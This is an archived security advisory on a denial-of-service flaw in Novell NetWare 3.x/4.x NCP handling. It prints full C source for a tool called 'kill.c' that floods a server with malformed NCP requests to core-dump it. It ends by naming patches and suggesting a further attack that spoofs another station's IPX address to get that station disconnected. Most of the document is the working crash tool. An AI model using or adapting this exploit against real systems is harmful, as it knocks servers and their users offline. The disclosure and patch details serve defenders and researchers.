COMMAND

    NCP

SYSTEMS AFFECTED

    Netware 3.x/4.x

PROBLEM

    Jitsu-Disk discovered the following while playing around with  the
    Intrude  code  from  Pandora,  and  came  up  with  kill.c, an NCP
    garbag/flame thrower.   Compiled this runs  fine under Win95,  for
    DOS get the Csdpmi3b.zip file from the following page:

        www.nmrc.org/pandora/download.html

    Exploit follows:

    /* Netware Killer, by Jitsu-Disk, march/98            */
    /* Greetz to the eleete team at www.nmrc.org          */
    /* Heavily inspired by the intrude source code        */
    /* in Pandora 2 by  oO Simple Nomad Oo                */
    /*                                                    */
    /******************************************************/
    /*                                                    */
    /* Compiles under GNU gcc for DOS (DJGPP v2.x)        */
    /* Must have a fast PC (min P100/16meg)               */
    /* Uses Win95 or DOS loaded with cwsdpmi              */
    /* You need to have the Network/IPX drivers loaded    */
    /* SOMETIMES WORK WHEN NOT LOGGED INTO THE NETWORK    */
    /* BUT YOU NEED TO "SEE" THE NETWORK i.e WON'T WORK   */
    /* RIGHT AFTHER A LOGOUT */

    #include <dos.h>
    typedef unsigned int uint8;

    /*
     * int21, multiple NCP request with gibberish data will core dump
     * Netware Servers (any flavor ??). Tested under Novell 4.11 with
     * a few patch.
     */
    int shreq(int f, uint8 *req, int rl, uint8 *ans, int al) {
      union REGS r;
      r.w.cx=rl;
      r.w.dx=al;
      r.w.si=((unsigned)(req));
      r.w.di=((unsigned)(ans));
      r.w.ax=0xf200|f;
      int86(0x21,&r,&r);
    }

    int setconn(int c) /* connect to first server */ {
      union REGS r;
      r.w.ax=0xf000;  /* set preferred connection nr */ r.w.dx=c+1;
      int86(0x21,&r,&r);
      return(r.w.ax&0xff);
    }

    /*
    * Main prog
    */
    int main()
    { int err;
      uint8 *nonsense;
      *nonsense=0x00;
      err=setconn(0);
      puts("This program will core dump Novell(tm) Servers");
      puts(" You do not need to be logged into the network to run this.");
      puts(" You do need to see the network i.e can't be used right afther a logout.");
      puts(" This have also proved to crash the clients on random basis.");
      if (err)
        printf("Failed to connect to server : %02x\n",err);
      for(err=0;err<257;err++) shreq(err,nonsense,5,nonsense,0);
    }

SOLUTION

    The latest service pack for Novell 3.1x/4.10 or  4.11/Intranetware
    (check for  410pt8a.exe or  iwsp4b.exe) correct  this bug. However
    the  way  the  patched  server  deals with the invalid connections
    introduce some curious glitch:

        1) It seems  that when you  reach NCP 130-131  all workstation
           connected  to  the  server  are  warned  that  "Station  xx
           attempted  a  remote  console  function  without sufficient
           permission"...  Apart from  the fact that the  broadcasting
           of the message  is a nag,  does that mean  that previous to
           the patch one  could issue a  remote console function  that
           would be processed without even being logged in?

        2) The way the patched server deals with the station when such
           a request  is issued  is to  kill all  connection with that
           station leaving no choice but a reboot... Seems we've got a
           nice denial of service here if we spoof the IPX address  of
           some other station..."